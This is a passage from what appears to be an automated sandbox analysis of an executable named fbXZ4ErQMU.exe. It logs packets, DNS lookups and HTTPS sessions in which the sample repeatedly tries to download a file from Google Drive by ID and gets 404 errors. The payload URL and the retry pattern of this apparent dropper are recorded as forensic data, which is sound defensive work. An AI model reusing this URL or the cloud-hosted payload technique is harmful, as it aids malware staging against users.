                                                        Dec 5, 2024 17:08:37.848591089 CET49812443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:37.848750114 CET49812443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:47.861289978 CET49813443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:47.861398935 CET44349813142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:47.861613989 CET49813443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:47.861785889 CET49813443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:47.861835957 CET44349813142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:48.128132105 CET44349813142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:48.128346920 CET49813443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:48.128627062 CET49813443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:48.128635883 CET44349813142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:48.128923893 CET49813443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:48.128937006 CET44349813142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:48.402578115 CET44349813142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:48.402642965 CET44349813142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:48.402785063 CET49813443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:48.403150082 CET49813443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:48.403150082 CET49813443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:48.403182983 CET44349813142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:48.403500080 CET49813443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:48.404460907 CET49814443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:48.404503107 CET44349814142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:08:48.404783010 CET49814443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:48.404958963 CET49814443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:48.404973030 CET44349814142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:08:48.673377991 CET44349814142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:08:48.673666000 CET49814443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:48.673976898 CET49814443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:48.674015999 CET44349814142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:08:48.674107075 CET49814443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:48.674145937 CET44349814142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:08:48.987870932 CET44349814142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:08:48.988097906 CET49814443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:48.988151073 CET44349814142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:08:48.988188028 CET44349814142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:08:48.988394976 CET44349814142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:08:48.988425016 CET49814443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:48.988594055 CET49814443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:48.988758087 CET49814443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:48.988801003 CET44349814142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:08:58.999538898 CET49815443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:58.999649048 CET44349815142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:58.999974012 CET49815443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:59.000094891 CET49815443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:59.000135899 CET44349815142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:59.280548096 CET44349815142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:59.280893087 CET49815443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:59.281359911 CET49815443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:59.281369925 CET44349815142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:59.281481981 CET49815443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:59.281491995 CET44349815142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:59.563323975 CET44349815142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:59.563529968 CET44349815142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:59.563640118 CET49815443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:59.563720942 CET49815443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:59.563790083 CET49815443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:08:59.563848972 CET44349815142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:08:59.564311981 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:59.564342022 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:08:59.564584017 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:59.564785004 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:59.564801931 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:08:59.833995104 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:08:59.834175110 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:59.834522009 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:59.834537029 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:08:59.834682941 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:59.834697962 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:00.154993057 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:00.155183077 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:00.155196905 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:00.155237913 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:00.155313969 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:00.155406952 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:00.155406952 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:00.155581951 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:00.155921936 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:00.155957937 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:10.168889046 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.168973923 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.169162035 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.169327974 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.169380903 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.442018032 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.442203045 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.442509890 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.442555904 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.442598104 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.442619085 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.715497017 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.715740919 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.715744972 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.715878010 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.715933084 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.715953112 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.716092110 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.716223001 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:10.716296911 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:10.716500044 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:10.716617107 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:10.716650963 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:10.982760906 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:10.982960939 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:10.983258009 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:10.983273983 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:10.983553886 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:10.983575106 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:11.302784920 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:11.302938938 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:11.302962065 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:11.302980900 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:11.302997112 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:11.303189993 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:11.303462029 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:11.303519011 CET44349818142.250.64.193192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 5, 2024 17:03:00.590044022 CET | 62604 | 53 | 192.168.11.20 | 1.1.1.1
Dec 5, 2024 17:03:00.715198040 CET | 53 | 62604 | 1.1.1.1 | 192.168.11.20
Dec 5, 2024 17:03:01.309020996 CET | 61091 | 53 | 192.168.11.20 | 1.1.1.1
Dec 5, 2024 17:03:01.438091040 CET | 53 | 61091 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 5, 2024 17:03:00.590044022 CET | 192.168.11.20 | 1.1.1.1 | 0x6af5 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 17:03:01.309020996 CET | 192.168.11.20 | 1.1.1.1 | 0xf573 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 5, 2024 17:03:00.715198040 CET | 1.1.1.1 | 192.168.11.20 | 0x6af5 | No error (0) | drive.google.com | | 142.250.217.238 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 17:03:01.438091040 CET | 1.1.1.1 | 192.168.11.20 | 0xf573 | No error (0) | drive.usercontent.google.com | | 142.250.64.193 | A (IP address) | IN (0x0001) | false
                                                        • drive.google.com
                                                        • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49751 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 16:03:01 UTC | 216 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
2024-12-05 16:03:01 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:01 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-F6G6bR_yHGxtarlfAUxgCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        1 | 192.168.11.20 | 49752 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:03:01 UTC | 258 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        2024-12-05 16:03:02 UTC | 2222 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:01 GMT
                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                        Content-Security-Policy: script-src 'nonce-oNPDdKAk37_6oigAA74vJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5jf1TaTr9YTTJPToHFfbzYasyfvoHbXluHJrAH5cmUs9ZhDBjVIqFmUuxRHE7rBYv6fwM
                                                        Server: UploadServer
                                                        Set-Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF; expires=Fri, 06-Jun-2025 16:03:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:03:02 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FVq4szJ_Wbzbj2lYvwNNvw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        2 | 192.168.11.20 | 49753 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:03:12 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:12 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:12 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-MUSZ17QPvNwTr9p3pZA4Fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        3 | 192.168.11.20 | 49754 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:03:12 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:13 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:13 GMT
                                                        Content-Security-Policy: script-src 'nonce-Mmoj_ohssKHKHy5i_yN9cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC7-mo0eyhSx3jVfBzA13XnWUgKAUmJuKurAgPVwfzX6ldUm5jmWvaoqHpiL_Z1eCVCcWy8Q5jjyJw
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:03:13 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BUyhgdugqCVT2fAsENsLvA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        4 | 192.168.11.20 | 49755 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:03:23 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:23 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:23 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-x9yDRAEl3iGWRv7e3DuAcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        5 | 192.168.11.20 | 49756 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:03:24 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:24 UTC | 1847 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:24 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
